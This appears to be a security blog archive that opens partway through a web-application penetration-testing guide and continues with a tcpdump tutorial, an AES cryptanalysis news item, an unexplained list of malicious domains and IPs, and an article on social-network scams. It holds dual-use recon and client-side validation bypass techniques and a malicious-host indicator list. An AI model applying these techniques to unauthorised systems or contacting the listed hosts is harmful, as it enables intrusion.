  2. Investigate the format and wording of 404/other error pages

    Some application environments (such as ColdFusion) have customized and therefore easily recognizable error pages, and will often give away the software versions of the scripting language in use. The tester should deliberately request invalid pages and utilize alternate request methods (POST/PUT/Other) in order to glean this information from the server.

    Below is an example of a ColdFusion 404 error page:

    ColdFusion 404 error page

  3. Test for recognised file types/extensions/directories

    Many Web services (such as Microsoft IIS) will react differently to a request for a known and supported file extension than an unknown extension. The tester should attempt to request common file extensions such as .ASP, .HTM, .PHP, .EXE and watch for any unusual output or error codes.

    GET /blah.idq HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Wed, 04 Jun 2003 11:12:24 GMT
    Content-Type: text/html

    <HTML>The IDQ file blah.idq could not be found.

  4. Examine source of available pages

    The source code from the immediately accessible pages of the application front-end may give clues as to the underlying application environment.

    <title>Home Page</title>
    <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
    <meta content="C#" name="CODE_LANGUAGE">
    <meta content="JavaScript" name="vs_defaultClientScript">

    In this situation, the developer appears to be using MS Visual Studio 7. The underlying environment is likely to be Microsoft IIS 5.0 with .NET framework.

  5. Manipulate inputs in order to elicit a scripting error

    In the example below the most obvious variable (ItemID) has been manipulated to fingerprint the Web application environment:

    ItemID manipulation in a URL

  6. TCP/ICMP and Service Fingerprinting

    Using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tools Amap and WebServerFP, the penetration tester can gain a more accurate idea of the underlying operating systems and Web application environment than through many other methods. Nmap and Queso examine the nature of the host's TCP/IP implementation to determine the operating system and, in some cases, the kernel version and patch level. Application fingerprinting tools rely on data such as Server HTTP headers to identify the host's application software.

Hidden form elements and source disclosure

In many cases developers require inputs from the client that should be protected from manipulation, such as a user-variable that is dynamically generated and served to the client, and required in subsequent requests. In order to prevent users from seeing and possibly manipulating these inputs, developers use form elements with a HIDDEN tag. Unfortunately, this data is in fact only hidden from view on the rendered version of the page - not within the source.

There have been numerous examples of poorly written ordering systems that would allow users to save a local copy of order confirmation pages, edit HIDDEN variables such as price and delivery costs, and resubmit their request. The Web application would perform no further authentication or cross-checking of form submissions, and the order would be dispatched at a discounted price!

<FORM METHOD="LINK" ACTION="/shop/checkout.htm">
<INPUT TYPE="HIDDEN" name="quoteprice" value="4.25">Quantity: <INPUT TYPE="text"
NAME="totalnum"> <INPUT TYPE="submit" VALUE="Checkout">
</FORM>

This practice is still common on many sites, though to a lesser degree. Typically only non-sensitive information is contained in HIDDEN fields, or the data in these fields is encrypted. Regardless of the sensitivity of these fields, they are still another input to be manipulated by the blackbox penetration tester.

All source pages should be examined (where feasible) to determine if any sensitive or useful information has been inadvertently disclosed by the developer - this may take the form of active content source within HTML, pointers to included or linked scripts and content, or poor file/directory permissions on critical source files. Any referenced executables and scripts should be probed, and if accessible, examined.

Javascript and other client-side code can also provide many clues as to the inner workings of a Web application. This is critical information when blackbox testing. Although the whitebox (or 'code-auditing') tester has access to the application's logic, to the blackbox tester this information is a luxury which can provide for further avenues of attack. For example, take the following chunk of code:

<INPUT TYPE="SUBMIT" onClick="
if (document.forms['product'].elements['quantity'].value >= 255) {
document.forms['product'].elements['quantity'].value='';
alert('Invalid quantity');
return false;
} else {
return true;
}
">

This suggests that the application is trying to protect the form handler from quantity values of 255 or more - the maximum value of a tinyint field in most database systems. It would be trivial to bypass this piece of client-side validation, insert a long integer value into the 'quantity' GET/POST variable and see if this elicits an exception condition from the application.
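
A hedged PHP sketch of the corresponding server-side check (the field name follows the JavaScript above; the surrounding handler is hypothetical) shows how the same rule must be enforced again on the server, since the client-side script can simply be bypassed:

 <?php
 // Re-validate on the server: never trust the client-side check alone.
 $quantity = isset($_POST['quantity']) ? $_POST['quantity'] : '';

 if (!ctype_digit($quantity) || (int)$quantity < 1 || (int)$quantity > 254) {
     // Out of the valid domain for a tinyint-backed field.
     die('Invalid quantity');
 }

 echo 'Quantity accepted: ' . (int)$quantity;
 ?>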

Determining Authentication Mechanisms

One of the biggest shortcomings of the Web application environment is its failure to provide a strong authentication mechanism. Of even more concern is the frequent failure of developers to apply the mechanisms that are available effectively. It should be explained at this point that the term Web application environment refers to the set of protocols, languages and formats - HTTP, HTTPS, HTML, CSS, JavaScript, etc. - that are used as a platform for the construction of Web applications. HTTP provides two forms of authentication: Basic and Digest. These are both implemented as a series of HTTP requests and responses, in which the client requests a resource, the server demands authentication and the client repeats the request with authentication credentials. The difference is that Basic authentication sends the credentials in clear text, while Digest authentication hashes them together with a nonce (a time-sensitive value) provided by the server.

Besides the obvious problem of clear text credentials when using Basic, there is nothing inherently wrong with HTTP authentication, and the clear-text problem can be mitigated by using HTTPS. The real problem is twofold. First, since this authentication is applied by the Web server, it is not easily within the control of the Web application without interfacing with the Web server's authentication database. Therefore custom authentication mechanisms are frequently used, and these open a veritable Pandora's box of issues in their own right. Second, developers often fail to correctly assess every avenue for accessing a resource and then apply authentication mechanisms accordingly.

Given this, penetration testers should attempt to ascertain both the authentication mechanism that is being used and how this mechanism is being applied to every resource within the Web application. Many Web programming environments offer session capabilities, whereby a user provides a cookie or a Session-ID HTTP header containing a pseudo-unique string identifying their authentication status. This can be vulnerable to attacks such as brute forcing, replay, or re-assembly if the string is simply a hash or concatenated string derived from known elements.

Every attempt should be made to access every resource via every entry point. This will expose problems where a root level resource such as a main menu or portal page requires authentication but the resources it in turn provides access to do not. An example of this is a Web application providing access to various documents as follows. The application requires authentication and then presents a menu of documents the user is authorised to access, each document presented as a link to a resource such as:

http://www.server.com/showdoc.asp?docid=10

Although reaching the menu requires authentication, the showdoc.asp script requires no authentication itself and blindly provides the requested document, allowing an attacker to simply insert the docid GET variable of his choice and retrieve the document. As elementary as it sounds, this is a common flaw in the wild.
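
A brief PHP sketch of the missing per-resource check (illustrative only; the session flag, lookup function and document location are assumptions) would verify both authentication and authorisation inside the document-serving script itself, not just in the menu:

 <?php
 session_start();

 // The menu check is not enough: the document handler itself must check.
 if (empty($_SESSION['authenticated'])) {
     header('HTTP/1.1 403 Forbidden');
     exit('Authentication required');
 }

 $docid = isset($_GET['docid']) ? intval($_GET['docid']) : 0;

 // user_may_access() is a hypothetical lookup against the user's
 // authorisation list; only documents on that list are served.
 if (!user_may_access($_SESSION['user'], $docid)) {
     header('HTTP/1.1 403 Forbidden');
     exit('Not authorised for this document');
 }

 readfile('/var/docs/' . $docid . '.html');

 function user_may_access($user, $docid) {
     // Hypothetical stub; a real application would consult its database.
     return false;
 }
 ?>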

Conclusions

In this article we have presented the penetration tester with an overview of web applications and how web developers obtain and handle user inputs. We have also shown the importance of fingerprinting the target environment and developing an understanding of the back-end of an application. Equipped with this information, the penetration tester can proceed to targeted vulnerability tests and exploits. The next installment in this series will introduce code and content-manipulation attacks, such as PHP/ASP code injection, SQL injection, Server-Side Includes and Cross-site scripting.


tcpdump



Introduction

In this article I would like to talk about one of the most useful tools in my networking toolbox: tcpdump. Unfortunately, mastering this tool completely is not an easy task. Yet the things you do most often are relatively simple, and they make a good springboard for diving into more complex topics.

tcpdump uses

tcpdump is a packet sniffer. It is able to capture traffic that passes through a machine. It operates at the packet level, meaning that it captures the actual packets that fly in and out of your computer. It can save the packets into a file, either whole packets or only their headers. Later you can "play" the recorded file back and apply different filters to the packets, telling tcpdump to ignore packets that you are not interested in seeing.

Under the hood, tcpdump understands protocols and host names. It will do all in its power to see what host sent each packet and will tell you its name instead of the IP address.

It is an exceptionally useful tool for debugging what might have caused a certain networking-related problem. It is also an excellent tool for learning new things.

Invocation

Invoking tcpdump is easy. The first thing to remember is that you should either be logged in as root or be a sudoer on the computer – a sudoer is someone who is entitled to gain administrator rights on the computer for a short period of time using the sudo command.

Running tcpdump without any arguments makes it capture packets on the first network interface (excluding lo) and print a short description of each packet to the output. This may cause a bit of a headache if you are using the network to connect to the machine. If you are connected with SSH or telnet (rlogin?), running tcpdump will produce a line of text for each incoming or outgoing packet. That line of text will cause the SSH daemon to send a packet carrying it, which in turn causes tcpdump to produce another line of text, and this will not stop until you do something about it.

Simple filtering

So the first thing we will learn about tcpdump is how to filter out SSH and telnet packets. We will study the basics of tcpdump filtering later in this guide, but for now just remember this syntax:

# tcpdump not port 22

"not port 22" is a filter specification that tells tcpdump to filter out packets with IP source or destination port 22. As you know, port 22 is the SSH port. Basically, when you give tcpdump a filter like this, it will ignore all SSH packets – exactly what we need.

Telnet, on the other hand, uses port 23. So if you are connecting via telnet, you can filter that out with:

# tcpdump not port 23

Clear and simple!

Reading tcpdump's output

By default tcpdump produces one line of text for every packet it intercepts. Each line starts with a time stamp, which tells you precisely when the packet arrived.

Next comes the protocol name. Unfortunately, tcpdump understands only a limited number of protocols. It won't tell you the difference between packets belonging to, for instance, an HTTP stream and an FTP stream; instead, it will mark such packets simply as IP packets. It does have some limited understanding of TCP. For instance, it identifies TCP synchronization packets such as SYN, ACK, FIN and others. This information is printed after the source and destination IP addresses (if it is an IP packet).

Source and destination addresses follow the protocol name. For IP packets, these are IP addresses. For other protocols, tcpdump does not print any identifiers unless explicitly asked to do so (see the -e command line switch below).

Finally, tcpdump prints some information about the packet. For instance, it prints TCP sequence numbers, flags, ARP/ICMP commands, etc.

Here’s an example of typical tcpdump output.

17:50:03.089893 IP 69.61.72.101.www > 212.150.66.73.48777: P 1366488174:1366488582
(408) ack 2337505545 win 7240 <nop,nop,timestamp 1491222906 477679143>

This packet is part of an HTTP data stream. You can see the meaning of each and every field of the packet description in tcpdump's manual page.

Here’s another example

17:50:00.718266 arp who-has 69.61.72.185 tell 69.61.72.1

This is an ARP packet. It is slightly more self-explanatory than the TCP packet above. Again, to see the exact meaning of each field in the packet description, see tcpdump's manual page.

Invocation continued

Now that we know how to invoke tcpdump even when connecting to the computer over the network, let's see what command line switches are available to us.

Choosing an interface

We'll start with a simple one: how to dump packets that arrive at and are sent through a certain network interface. The -i command line argument does exactly this.

# tcpdump -i eth1

This will cause tcpdump to capture packets from network interface eth1. Or, considering our SSH/telnet experience:

# tcpdump -i eth1 not port 22

Finally, you can specify any as the interface name to tell tcpdump to listen on all interfaces.

# tcpdump -i any not port 22

Turning off name resolution

As we debug networking issues, we may encounter a problem with how tcpdump works out of the box. The problem is that it tries to resolve every single IP address that it meets; that is, when it sees an IP packet it asks the DNS server for the names of the computers behind the IP addresses. This works flawlessly most of the time, but there are two problems.

First, it slows down packet interception. This is not a big deal when there are only a few packets, but when there are thousands and tens of thousands it introduces a delay into the process. The amount of delay varies, depending on the traffic.

Another, much more serious problem occurs when there is no DNS server around, or when the DNS server is not working properly. In that case, tcpdump spends a few seconds trying to resolve the two hostnames for each IP packet, which virtually stops traffic interception.

Luckily there is a way around this: the -n option causes tcpdump to stop resolving hostnames.

# tcpdump -n

And here are a few variations of how you can use this option in conjunction with options that we have already learned:

# tcpdump -n -i eth1
# tcpdump -ni eth1 not port 22

Limiting number of packets to intercept

Here are a few more useful options. Sometimes the amount of traffic going in and out of your computer is very high, while all you want to see is just a few packets. Often you want to see who is sending you the traffic, but when you try to capture anything with tcpdump it dumps so many packets that you cannot understand a thing. This is where the -c command line switch comes in handy.

It tells tcpdump to limit the number of packets it intercepts: you specify the number of packets you want to see, tcpdump captures that many packets and then exits. This is how you use it:

# tcpdump -c 10

Or with options that we’ve learned before.

# tcpdump -ni eth1 -c 10 not port 22

This limits the number of packets tcpdump will receive to 10. Once it has received 10 packets, tcpdump will exit.

Saving captured data

One of the most useful tcpdump features allows capturing incoming and outgoing packets into a file and then playing this file back. By the way, you can play this file back not only with tcpdump, but also with Wireshark (formerly Ethereal), the graphical packet analyzer.

You can do this with the -w command line switch. It should be followed by the name of the file that will contain the packets, like this:

# tcpdump -w file.cap

Or adding options that we’ve already seen

# tcpdump -ni eth1 -w file.cap not port 22

Changing packet size in the capture file

By default, when capturing packets into a file, it will save only 68 bytes of the data from each packet. Rest of the information will be thrown away.

One of the things I often do when capturing traffic into a file is change the saved packet size. The disk space required to save those extra bytes is cheap and usually available, so spending a few spare megabytes of disk space on a capture isn’t too painful. On the other hand, losing a valuable portion of the packets can be critical.

So, what I usually do when capturing into a file is run tcpdump with the -s command-line switch. It tells tcpdump how many bytes of each packet to save. Specifying 0 as the packet’s snapshot length tells tcpdump to save the whole packet. Here is how it works:

# tcpdump -w file.cap -s 0

And in conjunction with options we have already seen:

# tcpdump -ni eth1 -w file.cap -s 0 -c 1000 not port 22

Obviously you can save as much data as you want; specifying 1000 bytes will usually do the job. Just keep in mind that there are so-called jumbo frames, whose size can exceed 8 KB.

Reading from capture file

Now that we have captured some traffic into a file, we would like to play it back. The -r command-line switch tells tcpdump to read the data from a file instead of capturing packets from an interface. This is how it works.

# tcpdump -r file.cap

With a capture file, we can easily analyze the packets and understand what’s inside. tcpdump offers several options that help with this task. Let's see a few of them.
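Note that filter expressions (covered below) also apply when reading from a file. As a quick sketch, assuming file.cap is the capture we just recorded, the following replays only its HTTP traffic:

# tcpdump -n -r file.cap port 80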

Looking into packets

There are several options that let you see more information about a packet. There is a problem, though. In general, tcpdump does not give you much detail about packet contents; it does not dissect the different protocols.

If you want to see a packet’s content, it is better to use a tool like Wireshark. It understands protocols, analyzes them, and lets you see the individual fields, not only in the TCP header but also in layer 7 protocol headers.

tcpdump is a command-line tool, and like most command-line tools, its ability to present information is quite limited. Still, it has a few options that control the way packets are presented.

Seeing Ethernet header for each packet

The -e command-line switch causes tcpdump to print the Ethernet (link-level protocol) header for each printed packet. Let's see an example.

# tcpdump -e -n not port 22

Controlling time stamp

There are four command-line switches that control the way tcpdump prints time stamps. First, there is the -t option, which makes tcpdump omit time stamps altogether. Next comes -tt, which causes tcpdump to print the time stamp as the number of seconds since January 1st, 1970, plus a fraction of a second. -ttt prints the delta between the current line and the previous one. Finally, -tttt causes tcpdump to print the time stamp in its regular format preceded by the date.
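For instance, a quick sketch reusing the eth1 interface and the "not port 22" filter from earlier, printing inter-packet deltas or full date-and-time stamps:

# tcpdump -ttt -ni eth1 not port 22
# tcpdump -tttt -ni eth1 not port 22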

Controlling verbosity

-v causes tcpdump to print more information about each packet. With -vv, tcpdump prints even more information. As you might guess, -vvv produces more information still. Finally, -vvvv will produce an error message telling you there is no such option :D
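Combined with the switches we have already covered (again just a sketch using the same interface and filter), a more verbose capture might look like this:

# tcpdump -vv -ni eth1 not port 22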

Printing content of the packet

The -x command-line switch makes tcpdump print each packet in hexadecimal format. The number of bytes printed remains somewhat of a mystery: as is, it prints the first 82 bytes of the packet, excluding the Ethernet header. You can control the number of bytes printed using the -s command-line switch.

In case you want to see the Ethernet header as well, use -xx. It causes tcpdump to print an extra 14 bytes for the Ethernet header.

Similarly, -X and -XX print the contents of the packet in both hexadecimal and ASCII formats. The latter also includes the Ethernet header in the printout.
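Putting this together with the snapshot-length option (a sketch built only from the switches introduced above), the following prints the full hex and ASCII contents of the first five non-SSH packets on eth1:

# tcpdump -X -s 0 -c 5 -ni eth1 not port 22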

Packet filtering

We have already seen a simple filter. It causes tcpdump to ignore SSH packets, allowing us to run tcpdump over a remote connection. Now let's try to understand the language tcpdump uses to evaluate filter expressions.

Packet matching

We should understand that tcpdump applies our filter to every single incoming and outgoing packet. If a packet matches the filter, tcpdump accepts the packet and, depending on the command-line switches, either saves it to a file or dumps it to the screen. Otherwise tcpdump ignores the packet and accounts for it only in the summary it prints on exit, which tells how many packets were received, dropped, and filtered out.

To demonstrate this, let's go back to the not port 22 expression. tcpdump ignores packets that are either sourced from or destined to port 22. When such a packet arrives, tcpdump applies the filter to it, and since the result is false, it drops the packet.

More qualifiers

So, from what we’ve seen so far, we can conclude that tcpdump understands the word port and understands expression negation with not. Actually, negating an expression is part of the complex-expression syntax, and we will talk about complex expressions a little later. In the meantime, let's see a few more packet qualifiers that we can use in tcpdump expressions.

We’ve seen that the port qualifier matches either the source or the destination port number. If we want to match only the source port or only the destination port, we can use src port or dst port. For instance, the following expression shows all outgoing HTTP packets.

# tcpdump -n dst port 80

We can also specify ranges of ports. The portrange, src portrange and dst portrange qualifiers do exactly this. For instance, here is a command that captures all telnet and SSH packets.

# tcpdump -n portrange 22-23

Specifying addresses

Using the dst host, src host and host qualifiers you can match the destination IP address, the source IP address, or either of them. For example:

# tcpdump src host alexandersandler.net

This prints all packets originating from the alexandersandler.net host.

You can also specify Ethernet addresses. You do that with the ether src, ether dst and ether host qualifiers. Each should be followed by the MAC address of the source machine, the destination machine, or either of them, respectively.
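For example (a sketch; 00:11:22:33:44:55 is just a placeholder MAC address), the following captures only packets sent from that Ethernet address:

# tcpdump -ni eth1 ether src 00:11:22:33:44:55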

You can specify networks as well. The net, src net and dst net qualifiers do exactly this. Their syntax, however, is slightly more complex than that of a single host, because a netmask has to be specified.

You can use two basic forms of network specification: one using a netmask and the other using so-called CIDR notation. Here are a few examples.

# tcpdump src net 67.207.148.0 mask 255.255.255.0

Or the same command using CIDR notation.

# tcpdump src net 67.207.148.0/24

Note the word mask that does the job of specifying the network in the first example. The second example is much shorter.

Other qualifiers

There are several useful qualifiers that don’t fall under any of the categories I already covered.

For instance, you can match packets by their length. The less and greater qualifiers tell tcpdump that you are interested in packets whose length is less than or greater than the value you specify.

Here’s an example that demonstrates these qualifiers in use.

# tcpdump -ni eth1 greater 1000

This captures only packets whose size is greater than 1000 bytes.

Complex filter expressions

As we have already seen, we can build more complex filter expressions using tcpdump's filter language. In fact, tcpdump allows exceptionally complex filtering expressions.

We’ve seen the not port 22 expression. Applying this expression to a given packet produces logical true for packets that are neither sourced from nor destined to port 22. In other words, not negates the expression.

In addition to negating an expression, we can build more complex expressions by combining two smaller expressions into one larger one using the and and or keywords. You can also use brackets to group several expressions together.

For example, let's look at a tcpdump filter that captures packets larger than 100 bytes originating from google.com or from microsoft.com.

# tcpdump -XX greater 100 and \(src host google.com or src host microsoft.com\)

The and and or keywords in the tcpdump filter language have the same precedence and are evaluated left to right. This means that without brackets, tcpdump could have captured packets from microsoft.com regardless of packet size. With brackets, tcpdump first makes sure that all packets are greater than 100 bytes and only then checks their origin.

Note the backslash symbol (“\”) before each bracket. We have to place it there because of the shell: the Unix shell has its own special meaning for brackets, so we must tell it to leave these particular brackets alone and pass them as they are to tcpdump. The backslash characters do exactly this.
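Alternatively (a common shell idiom rather than anything tcpdump-specific), you can put the whole filter expression in single quotes so that no escaping is needed:

# tcpdump -XX 'greater 100 and (src host google.com or src host microsoft.com)'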

Speaking of precedence, we have to keep in mind that in tcpdump's filter expression language not has higher precedence than and and or. tcpdump's manual page has a very nice example that emphasizes what this means.

not host vs and host ace

and

not (host vs or host ace)

are two different expressions. Because not has higher precedence than and and or, the filter in the first example captures packets that are not to/from vs but are to/from ace. The second filter, on the other hand, captures packets that are neither to/from vs nor to/from ace. That is, the first will capture a packet from ace to some other host (as long as that host is not vs), while the second example will not capture this packet.
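To try these on a live capture (a sketch; vs and ace are simply the example hostnames from the manual page, so substitute hosts that exist on your own network), you can quote each filter so the brackets survive the shell:

# tcpdump -n 'not host vs and host ace'
# tcpdump -n 'not (host vs or host ace)'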

Repeating qualifiers

To conclude this article, I would like to mention one more thing that may come in handy when writing complex tcpdump filter expressions.

Take a look at the following example.

# tcpdump -XX greater 100 and \(src host google.com or microsoft.com\)

We already saw this example, with one small exception: in the previous version there was a src host qualifier before microsoft.com, and now it's gone. The thing is that if we want to use the same qualifier twice in a row, we don't have to spell it out twice. Instead we can simply write the qualifier's parameter, and tcpdump will know what to do.

This makes tcpdump filter expressions shorter and much more readable.

Afterword

I hope you found this article useful. In case you have questions, suggestions, or you would like to express your appreciation to the author ;-) , don't hesitate to email me at alexander.sandler@gmail.com.


MS, AES security

Hacking 2011. 8. 26. 11:23
Microsoft: the first crack appears in the defenses of the AES encryption standard

Foreign media report that researchers at Microsoft in the United States and the Katholieke Universiteit Leuven in Belgium have found a method of attacking the widely used AES encryption algorithm.

According to the Leuven report (Biclique Cryptanalysis of the Full AES), the attack they devised can recover an AES secret key three to five times faster than previously thought possible.

The researchers caution that the attack is inherently complex and cannot be mounted easily with existing technology. In fact, even with the technique the researchers adopted, breaking the AES algorithm would still require computer processing time on the order of billions of years.

Nevertheless, the result of their long-running cryptanalysis project can fairly be described as the first hole opened in the defenses of the AES standard, which until now had been considered unbreakable.

When evaluating an encryption standard applied to critical tasks such as securing financial transactions, security experts judge whether the algorithm can withstand even highly determined, malicious attacks.

This is because even a technique considered secure at this moment may be easily broken once the faster computers or new numerical methods of the near future appear.

Commenting on this research, security expert Bruce Schneier wrote on his blog that it shows the security margin of AES continues to shrink.

Schneier also quoted on his blog a saying attributed to a US NSA expert: "Attacks always get better; they never get worse."
(www.schneier.com/blog/archives/2011/08/new_attack_on_a_1.html)

Although it would take enormous effort to carry out, the attack method the researchers established is effective against multiple versions of AES.

The project was completed by three researchers: Dmitry Khovratovich of Microsoft Research, Andrey Bogdanov of the Katholieke Universiteit Leuven, and Christian Rechberger of the Ecole Normale Superieure (ENS) in Paris.

Bogdanov and Rechberger reportedly took leave from their universities to focus on the project together with Microsoft Research. According to the Katholieke Universiteit Leuven, Joan Daemen and Vincent Rijmen, who proposed AES, also acknowledge the validity of the attack.

[Information provided by Professor Park Choon-sik, Seoul Women's University]

[Copyright ⓒ Dailysecu. Unauthorized reproduction and redistribution prohibited]



Malware URL

Hacking 2011. 8. 18. 02:23
a[0-99].googletrait.com    
ns[0-99].info    
dns[0-99].us    
dns[0-99].dyndns.info    
dns[0-99].dyndns.org    
221.218.161.0    
210.223.204.0    
183.92.47.0    
123.118.142.0    
61.96.202.0    
49.247.255.0    
back.windowsxps.co.kr    
update.microsoftshell.com    
mail.winxps.com    
116.127.121.41    
cache.soucesp.com    
ywliyi.com    
yxrkhjs.gov.cn    
yuhuabei.com.cn    
yutong168.com    
ywjnt.com    
ytzr.com    
xiaomiao.net    
www.xinnet00.com    
www.neoluxel.com    
www.niubiyizu.com    
www.wintergemfarm.com    
www.hkslag.co.kr    
www.aiosk.com    
www.diarix.net    
igameer.appspot.com    
secureplace.biz    
usb.2580.com    
w29.com    
robingood.beeglover.cn    
news.an85.kr    
core2948.mylivejournalchanel.com    
miteksns.co.rs    
www.sofec.21s.fr    
www.i42.de    
www.jnxsezzb.com    
www.popgrle.com    
checkdizz.com    
piclooks.com    
nabe-ma.bakblu.com    
iufdvm.com    
jaji79.com    
kakolog.desktop2ch.net.playwow.us    
intranet.tomonline-inc.com    
intranet.tomonline-inc.com    
dana79.com    
game.playwow.us    
echinababy.com    
cfgty.com    
cutyline.zuzunza.joins.com    
chinanasdaq.com    
aop1.homelinux.com    
b0t.meibu.com    
bot.timewalk.me    
ado77.com    
01023111478.kt.io    
merlinmotorsport.co.uk    
66xiu.com    
ro.diggfunny.com    
cache.mindplat.com    
124.236.50.9    110730
cache.soucesp.com    
123.147.244.3    110730
50.16.254.123    110730
216.108.235.94    110730
116.127.121.109    110729
121.78.237.135    110729
119.253.42.182    110729
lvlove.info    
dyndns-at-work.com    
dyndns-ip.com    
dyndns-pics.com    
dyndns-at-home.com    
dyndns-server.com    
dyndns-web.com    
dyndns.org    
dyndns-wiki.com    
dyndns-work.com    
dyndns.info    
dyndns-mail.com    
dyndns-remote.com    
dyndns.tv    
dyndns-office.com    
dyndns-home.com    
dyndns-blog.com    
dyndns.biz    
dyndns-free.com    
27.255.64.0    
222.1.41.0    
216.18.211.0    
nexononline.com    
nexongame.net    
reegame.net    
google-analytics.dyndns-mail.com    
hpsupport.dns1.us    
dns01.dyndns.info    
dell.dyndns-office.com    
down2.winsoft9.com    
jesr.info    
koreasys1.com    
kowec.com    
wstatic.dcinside.com    
jrkxkf.com    
centralserver.qicp.net    
ns.dns3-domain.com    
mail.nexongame.net    
a1.reegame.net    
94.100.23.27    
183.92.47.211    
123.118.142.187    
49.247.255.43    
googletrait.com    
mail.hp-supports.org    
file.hp-supports.com    
file.googlefiles.net    
hack520.co.kr    
support.nexononline.com    
222.1.41.47    
down.tzh.kr    
Mremote    
210.223.204.67    
221.218.161.209    
caihong.kr    
an85.kr    
0day.kr    
vul.kr    
MyApp1.0    
ibmsupport.dyndns.org    
ibmsupport.dyndns.org    
dellsupport.dyndns-server.com    
dell.dyndns-wiki.com    
dns00.dyndns.org    
www.dnf782.com    
www.lwb80038.com    
www.feel6663.com    
www.ulmani.com    
70.39.99.123    
174.128.224.37    
hmmdt.com    
xmd.aspscript.info    
dw.mxdblog.info    
sleep.dnfgame.info    
fdsadhw11.info    
www.torysl.com    
dw.irisfilm.info    
ad.cy.co.kr    
174.128.224.47    
70.39.99.115    
70.39.99.111    
ylkf.coochou.com    
72.18.195.183    
lrvou.info    
vgob.info    
96.44.173.210    
96.44.173.126    
96.44.173.125    
caryhands.com    
files.caryhands.com    
61.78.63.171    
218.38.54.179    
74.82.179.57:82    
q8q.in    
up.mhhsrn.com    
images.stmaiget.com    
3162 http iis isapi .ida    
img.uyrubr.com    
ad.ilikec1ick.com    
tgong.co.kr    
www.9191game.com    
www.indisk.co.kr    
www.alahb.com    
hao.yueren.info    
ad.imad.co.kr    
www.allbook.biz    
www.mount-tai.com.cn    
muryoj.com    
2chsearch.info    
down.skypesotf.com    
www.yxwy.net.CN    
wbm.whu.edu.cn    
bidstrafen.com    
boaoyy.com    
ddsjy.com    
xuefu1.com    
yxhh.net    
gpbctv.com    
pacenoge.org    
gregshin.pe.kr    
junggomania.nefficient.co.kr    
www.sina.com.cn    
travlman.com    
7766.org    
99-22.cn    
2288.org    
9966.org    
8800.org    
6600.org    
8866.org    
3322.org    
bta.net.cn    
yxhh.net    
mz.cn    
www.531140.com    
images.kidkids.net    


Facebook: Self-XSS, clickjacking and survey scams abound

With so many users, Facebook is a target for scams; it can also expose your personal information far beyond your group of friends.

Users need to remember that Facebook makes money from its advertisers, not users. Since advertisers want to get their message out to as many people as possible, Facebook shares your information with everyone, not just your "friends." And most recently, Facebook's facial recognition technology automatically suggests that friends tag you, unless you turn it off.

Scams on Facebook include cross-site scripting, clickjacking, survey scams and identity theft. One of the scammers' favorite methods of attack of the moment is known as cross-site scripting or "Self-XSS." Facebook messages such as Why are you tagged in this video? and the Facebook Dislike button take you to a webpage that tries to trick you into cutting and pasting a malicious JavaScript code into your browser’s address bar. Self-XSS attacks can also run hidden, or obfuscated, JavaScript on your computer allowing for malware installation without your knowledge.

Facebook scams also tap into interest in the news, holiday activities and other topical events to get you to innocently reveal your personal information. Facebook posts such as “create a Royal Wedding guest name” and "In honor of Mother’s Day" seem innocuous enough, until you realize that information such as your children’s names and birthdates, pet’s name and street name now reside permanently on the Internet. Since this information is often used for passwords or password challenge questions, it can lead to identity theft.

Other attacks on Facebook users include "clickjacking" or "likejacking," also known as "UI redressing." This malicious technique tricks web users into revealing confidential information or takes control of their computer when they click on seemingly innocuous webpages. Clickjacking takes the form of embedded code or script that can execute without the user's knowledge. One disguise is a button that appears to perform another function. Clicking the button sends out the attack to your contacts through status updates, which propagates the scam. Scammers try to pique your curiosity with messages like "Baby Born Amazing effects" and "The World Funniest Condom Commercial – LOL". Both clickjacking scams take users to a webpage urging them to watch a video. By viewing the video, it’s posted that you “like” the link and it’s shared with your friends, spreading it virally across Facebook.

Clickjacking is also often tied to “survey scams” which trick users into installing an application from a spammed link. Cybercriminals take advantage of news topics, such as the Osama bin Laden video scam, which takes you to a fake YouTube site in an effort to get you to complete a survey. Scammers earn commission for each person that completes it. Taking the survey also spreads the scam virally to your Facebook friends.

In theory, new Facebook security features provide protection against scams and spam—but unfortunately they’re mainly ineffectual. Self-XSS, clickjacking and survey scams essentially did not exist just a few years ago, but they now appear on Facebook and other social networks on a daily basis.

Our recent social networking poll also asked computer users which social network they felt posed the biggest security risk. Facebook is clearly seen as the biggest risk with 81% of the votes, a significant rise from the 60% who felt Facebook was the riskiest when we first asked the question a year ago. Twitter and MySpace each received 8% of the votes this year, and LinkedIn only 3%.

Twitter: Beware of shortened URLs

Twitter is a valuable source of real-time information. During the devastating Japanese earthquake and tsunami in March, Twitter users shared information and helped raise funds. Unfortunately, as often happens, scammers try to channel that goodwill for their own gain. A Twitter scam impersonating the British Red Cross asked tweeters to send money via MoneyBookers to a Yahoo email address in one Japanese tsunami charity scam. In another scam, emails resembling Twitter notifications included dangerous links disguised as a tsunami video. If you clicked on this link, malicious JavaScript could infect your computer.

Twitter users often shorten URLs via bit.ly and other services to keep tweets within their 140 character limit. Hackers can also create shortened URLs to easily redirect you to malicious sites, since the URL itself gives you no indication of the site name. Although most shortened URLs are legitimate, if a link brings you to another page that asks for a Twitter or Facebook password, leave immediately.

Similar to Facebook scams, Twitter messages promise such curiosities as the “Banned Lady Gaga Video,” which takes users to a fake YouTube page. If you click the play button, a window pops up and seeks permission to access your Twitter account. If you grant access, you allow third parties to post messages in your name. Another recent scam, “TimeSpentHere,” promises to tell you how many hours you’ve spent on Twitter. Since it appears to come from a Twitter friend, you may think about clicking on it. But this rogue application actually wants your email address, which could be used later for a phishing campaign or spam.

LinkedIn: Threats remain low

Although cybercriminals more frequently target users of Facebook and Twitter, the business networking site LinkedIn is also a target.

The biggest threat with LinkedIn is data-mining. Cybercriminals take information about companies and whom they employ, and then use that information to launch spearphishing attacks. Corporate directories also exist online, providing a wealth of information for spearphishers.

Malicious LinkedIn invitation reminders pose another threat. These links can redirect you to a webpage that installs a variant of the Zbot malware (also known as Zeus) onto your computer. If you click, remote hackers can now compromise your computer and potentially steal your confidential data.

Google Plus: Early users demand privacy

Google Plus, a recently launched social network that aims to compete head-to-head with Facebook, is learning the ropes as far as privacy is concerned. Google currently restricts the social network to a "limited field trial" so they can gather feedback, patch bugs and identify privacy holes before making the site available to a mass audience. Privacy experts say that Google Plus is designed to let people have better control over privacy with respect to sharing with family, co-workers and friends.

In response to initial user feedback, Google Plus recently changed its privacy options around gender, so that users do not have to reveal their gender online.

Protection strategies for social networking

